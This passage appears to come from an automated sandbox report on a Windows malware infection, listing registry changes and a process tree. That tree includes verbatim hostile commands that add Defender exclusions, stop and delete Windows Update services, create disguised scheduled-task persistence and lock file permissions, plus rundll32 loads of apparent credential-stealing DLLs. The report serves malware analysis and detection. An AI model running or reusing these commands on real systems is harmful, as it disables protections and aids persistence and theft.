| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000007c56611c100054656d7000003a0009000400efbe545690a57c56611c2e00000000000000000000000000000000000000000000000000d8dbbf00540065006d007000000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe
"C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe"
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\810.exe
C:\Users\Admin\AppData\Local\Temp\810.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0ed36631-a8e4-4f70-b931-251fc97814c5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\447.exe
"C:\Users\Admin\AppData\Local\Temp\447.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\447.exe
"C:\Users\Admin\AppData\Local\Temp\447.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe"
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
"C:\Users\Admin\AppData\Local\Temp\257D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build3.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\257D.exe
"C:\Users\Admin\AppData\Local\Temp\257D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe"
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Local\Temp\3C23.exe
C:\Users\Admin\AppData\Local\Temp\3C23.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\3D9B.exe
C:\Users\Admin\AppData\Local\Temp\3D9B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1196 -ip 1196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 340
C:\Users\Admin\AppData\Local\Temp\3FFE.exe
C:\Users\Admin\AppData\Local\Temp\3FFE.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4752 -ip 4752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2520 -ip 2520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 340
C:\Users\Admin\AppData\Local\Temp\4147.exe
C:\Users\Admin\AppData\Local\Temp\4147.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build3.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build3.exe"
C:\Users\Admin\AppData\Local\Temp\4AAE.exe
C:\Users\Admin\AppData\Local\Temp\4AAE.exe
C:\Users\Admin\AppData\Local\Temp\Player3.exe
"C:\Users\Admin\AppData\Local\Temp\Player3.exe"
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\51B4.exe
C:\Users\Admin\AppData\Local\Temp\51B4.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2848 -ip 2848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 812
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\223.exe
"C:\Users\Admin\AppData\Local\Temp\223.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\223.exe
"C:\Users\Admin\AppData\Local\Temp\223.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:R" /E
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1856
C:\Windows\system32\dllhost.exe
"C:\Windows\system32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2476 -ip 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 700
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe"
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build3.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build3.exe"
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4728 -ip 4728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1780
C:\Users\Admin\AppData\Local\Temp\37CD.exe
"C:\Users\Admin\AppData\Local\Temp\37CD.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\37CD.exe
"C:\Users\Admin\AppData\Local\Temp\37CD.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe"
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build3.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build3.exe"
C:\Users\Admin\AppData\Local\Temp\A9F7.exe
C:\Users\Admin\AppData\Local\Temp\A9F7.exe
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Ddpedoqywwaftue.dll,start
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4764 -ip 4764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 480
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k LocalService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 844 -ip 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 940
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 14066
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 1320 -ip 1320
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1320 -s 644
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5032 -ip 5032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 1768
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 14066
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
